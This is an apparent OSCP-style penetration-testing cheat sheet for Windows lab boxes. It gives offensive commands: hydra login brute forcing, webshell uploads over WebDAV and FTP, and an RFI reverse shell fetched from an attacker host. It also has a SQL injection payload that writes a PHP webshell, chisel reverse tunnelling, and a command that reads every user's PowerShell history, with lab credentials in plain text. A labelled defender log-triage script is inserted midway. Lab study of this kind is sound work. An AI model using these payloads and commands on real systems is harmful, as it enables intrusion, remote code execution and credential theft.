Windows
Based on the following PG Practice and PEN-200 boxes: Algernon, AuthBy, Billyboss, Craft, DVR4, Fish, Hepet, Internal, Jacko, Kevin, MedJed, Mice, Monster, Nickel, Slort, Squid, Shenzi, Hermes (OSCP A), Gust (OSCP B), Pascha (OSCP C).
Foothold
Port Scan
The nmap-scan script can be found here.
sudo nmap-scan <target-IP>

HTTP(S)
# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,
# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ

# Look up default credentials for the application
uv run creds search <appName>

# Brute force a login form (POST request)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER^&password=^PASS^:F=403'
# POST request (base64-encoded credentials)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER64^&password=^PASS64^:F=403'

# Search for known exploits (CLI tool)
searchsploit <appName> <version>
# Google dork
site:github.com <appName> exploit poc
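The two hydra entries above show up on the server side as a burst of failed POSTs against the login form. As an added, defender-side example that is not part of these notes, the Python below triages IIS W3C log lines for that pattern and, for the WebDAV upload commands further down, for successful PUTs of script files. The log lines, client addresses, login path and thresholds are constructed for the demonstration; the field layout is the default IIS W3C set.

```python
"""Triage IIS W3C access log lines for two server-side traces of the
commands on this page: a burst of failed login POSTs (hydra) and a
successful WebDAV PUT of a script file (cadaver / curl -T).

Added defender-side example, not part of the original notes. The log
lines below are constructed samples, not captured traffic."""

from collections import defaultdict
from datetime import datetime, timedelta

# Extensions IIS will execute if the file lands in the webroot.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Constructed sample log using the default IIS W3C field set.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2024-01-10 10:00:01 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.10 Mozilla/5.0 - 403 0 0 12
2024-01-10 10:00:01 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.10 Mozilla/5.0 - 403 0 0 11
2024-01-10 10:00:02 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.10 Mozilla/5.0 - 403 0 0 10
2024-01-10 10:00:02 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.10 Mozilla/5.0 - 403 0 0 13
2024-01-10 10:00:03 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.10 Mozilla/5.0 - 200 0 0 40
2024-01-10 10:05:00 10.0.0.5 POST /login.aspx - 8081 - 192.0.2.77 Mozilla/5.0 - 403 0 0 12
2024-01-10 10:07:30 10.0.0.5 PUT /cmdasp.aspx - 80 x7331 192.0.2.10 cadaver/0.23.3 - 201 0 0 9
2024-01-10 10:07:31 10.0.0.5 GET /cmdasp.aspx - 80 - 192.0.2.10 Mozilla/5.0 - 200 0 0 30
2024-01-10 10:08:00 10.0.0.5 PUT /notes.txt - 80 x7331 192.0.2.44 cadaver/0.23.3 - 201 0 0 8
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]  # header rotates may re-declare fields
            continue
        if not raw or raw.startswith("#"):
            continue
        values = raw.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def login_failures(entries, login_path="/login.aspx", fail_status="403",
                   threshold=4, window=timedelta(seconds=60)):
    """Return {client_ip: total_failures} for every client whose failed
    login POSTs reach `threshold` inside some `window`-long span."""
    per_client = defaultdict(list)
    for e in entries:
        if (e["cs-method"] == "POST"
                and e["cs-uri-stem"].lower() == login_path
                and e["sc-status"] == fail_status):
            per_client[e["c-ip"]].append(
                datetime.fromisoformat(f"{e['date']} {e['time']}"))
    flagged = {}
    for ip, times in per_client.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def script_uploads(entries):
    """Return (client_ip, uri) for successful PUTs whose target is a script file."""
    hits = []
    for e in entries:
        if (e["cs-method"] == "PUT"
                and e["sc-status"].startswith("2")
                and e["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS)):
            hits.append((e["c-ip"], e["cs-uri-stem"]))
    return hits


def triage(text):
    entries = list(parse_w3c(text))
    return {"login_bruteforce": login_failures(entries),
            "script_uploads": script_uploads(entries)}


if __name__ == "__main__":
    for kind, findings in triage(SAMPLE_LOG).items():
        print(kind, findings)
```

The failure status is a parameter because, as the hydra lines show, the form on this box answers a bad login with 403 rather than 401 or a 200 with an error page; point `fail_status` and `login_path` at whatever the application actually returns before relying on the count.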
# RFI revshell
curl --path-as-is -s "http://10.10.10.10:4443/site/index.php?page=http://192.168.45.241:443/revshell_ivan.php" --proxy 127.0.0.1:8080

# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!

# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output
# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/

# SQL injection enumeration
sqlmap -r login.req --batch
# Webshell
a' UNION SELECT "<?php echo shell_exec($_GET['c']); ?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php'--
# RCE
$ curl -s --path-as-is "http://192.168.180.127:45332/webshell.php?c=whoami"

SMB
# Check for known SMB vulnerabilities
sudo nmap --script=smb-vuln\* -p445 10.10.10.10

# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares
# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

FTP
# Anonymous login
ftp anonymous@target
ftp ftp@target

# Brute force
hydra -l <user> -P <passlist> ftp://<target>

# Download dir
wget -r ftp://ftp@target_directory

# Upload a file
ftp> put revshell_ivan.php

SMTP, POP3
# Enumerate users via SMTP VRFY
smtp-user-enum -M VRFY -U anarchy_output -t 10.10.10.10

# Read the mailbox over POP3
$ telnet 10.10.10.10 110
USER x7331
+OK x7331 is known here.
PASS Pass123!
+OK Welcome! 4 messages (4744 bytes)
LIST
+OK 4 messages, 4744 bytes
1 1342
2 963
3 1347
4 1092
RETR 1

Privilege Escalation
User Context
whoami /priv

# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Host Enumeration
systeminfo

# Start the chisel server on the attacking host
./chisel server -p 8000 --reverse
# Connect from the target host
.\chisel.exe client 192.168.45.157:8000 R:6033:127.0.0.1:3306
# Enumerate the forwarded port on the attacking host
mysql -h 127.0.0.1 -P 6033 -u root

SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares
# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999